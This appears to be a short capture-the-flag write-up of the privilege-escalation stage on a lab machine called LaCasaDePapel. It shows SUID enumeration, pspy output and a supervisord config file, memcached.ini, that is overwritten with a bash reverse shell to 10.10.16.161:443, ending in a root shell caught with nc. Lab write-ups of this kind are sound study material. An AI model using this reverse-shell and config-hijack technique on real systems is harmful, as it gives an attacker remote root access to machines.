4 box enum > privesc

SuidEnum

[~] Custom SUID Binaries (Interesting Stuff)
------------------------------
/usr/bin/abuild-sudo
/bin/bbsuid
------------------------------
lacasadepapel [~]$ ls -la
total 24
drwxr-sr-x    4 professo professo      4096 Aug  8 07:14 .
drwxr-xr-x    7 root     root          4096 Feb 16  2019 ..
lrwxrwxrwx    1 root     professo         9 Nov  6  2018 .ash_history -> /dev/null
drwx------    2 professo professo      4096 Jan 31  2019 .ssh
-rw-r--r--    1 root     root            88 Jan 29  2019 memcached.ini
-rw-r-----    1 root     nobody         434 Jan 29  2019 memcached.js
drwxr-sr-x    9 root     professo      4096 Jan 29  2019 node_modules

lacasadepapel [~]$ cat memcached.ini
[program:memcached]
command = sudo -u nobody /usr/bin/node /home/professor/memcached.js

lacasadepapel [/tmp/.d]$ ./pspy64 -f
2019/07/26 05:26:01 FS:                 OPEN | /etc/supervisord.conf                                                      
2019/07/26 05:26:01 FS:               ACCESS | /etc/supervisord.conf                                                         
2019/07/26 05:26:01 FS:             OPEN DIR | /home/professor                                                                
2019/07/26 05:26:01 FS:             OPEN DIR | /home/professor/                                                               
2019/07/26 05:26:01 FS:           ACCESS DIR | /home/professor                                                                
2019/07/26 05:26:01 FS:           ACCESS DIR | /home/professor/                                                              
2019/07/26 05:26:01 FS:           ACCESS DIR | /home/professor                                                                
2019/07/26 05:26:01 FS:           ACCESS DIR | /home/professor/
2019/07/26 05:26:01 FS:    CLOSE_NOWRITE DIR | /home/professor
2019/07/26 05:26:01 FS:    CLOSE_NOWRITE DIR | /home/professor/
2019/07/26 05:26:01 FS:                 OPEN | /home/professor/memcached.ini
2019/07/26 05:26:01 FS:               ACCESS | /home/professor/memcached.ini
2019/07/26 05:26:01 FS:        CLOSE_NOWRITE | /home/professor/memcached.ini

# we can delete memcached.ini and create a new one
lacasadepapel [~]$ echo -e "[program:memcached]\ncommand = bash -c 'bash -i  >& /dev/tcp/10.10.16.161/443 0>&1'" > memcached.ini
lacasadepapel [~]$ cat memcached.ini
[program:memcached]
command = bash -c 'bash -i  >& /dev/tcp/10.10.16.161/443 0>&1'

$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.161] from (UNKNOWN) [10.10.10.131] 58244
bash: cannot set terminal process group (3518): Not a tty
bash: no job control in this shell
bash-4.4# whoami;id
whoami;id
root
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

Last updated